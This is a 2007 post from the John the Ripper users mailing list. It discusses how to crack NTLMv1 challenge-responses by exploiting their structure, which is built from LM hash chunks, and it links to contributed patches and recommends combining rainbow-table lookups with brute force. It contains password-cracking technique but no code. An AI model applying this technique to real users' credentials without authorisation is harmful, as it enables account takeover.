Date: Tue, 13 Nov 2007 21:12:09 -0600 From: jmk <jmk@...fus.net> To: john-users@...ts.openwall.com Subject: Re: advice requested about NTLMv1 implementation On Tue, 2007-11-13 at 09:54 +0100, Simon Marechal wrote: > Hello, > > as most people know it's quite easy once you have a valid account on a > window computer (not vista) to retrieve an NTLMv1 response to an > arbitrary challenge. This makes it quite useful when looking for a valid > user password. > > This response is made of 3 chunks, based on the LM hash (which is made > of 2 chunks). The dependency is: > > C/R LM > 1st chunk 7 first bytes of the first LM chunk > 2nd chunk last byte of 1st LM chunk and 6 first bytes of 2nd chunk > 3rd chunk 2 last bytes of the second LM chunk > > It should be clear here that there are only 2^16 3rd chunks for a given > challenge. Getting the last 2 bytes of the 2nd chunk's LM hash is thus > quite fast. In the same way, once you know the 2nd LM chunk, it's quite > easy to retrieve the last byte of the 1st. > > It thus makes sense to only compute the LM hash, and do the full > computation on passwords whose last bytes match (with a false positive > rate of 1/2^16 and 1/2^8 for the 2nd and 1st chunk). > > It's straightforward to alter the LM cipher to crack either the last > chunk or the first chunk, but I can't see a smart way to attack both in > the same cipher, as the split() function would retrieve chunks that are > computed differently. Would someone have a good advice on that? I don't have any good advice for you on this specifically. ;) At the risk of pointing out the obvious, have you seen the basic implementation of LMv1/NTLMv1 posted here: http://openwall.com/john/contrib/john-18.104.22.168-netlm-netntlm-jmk-3.diff.gz http://openwall.com/john/contrib/john-1.7.2-all-8.diff.gz I've found coupling LMv1 (1st chunk) Rainbow Table look-ups with NTLMv1 brute-force guessing to be relatively quick for cracking a user's password. Joe -- To unsubscribe, e-mail john-users-unsubscribe@...ts.openwall.com and reply to the automated confirmation request that will be sent to you.
Powered by blists - more mailing lists
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.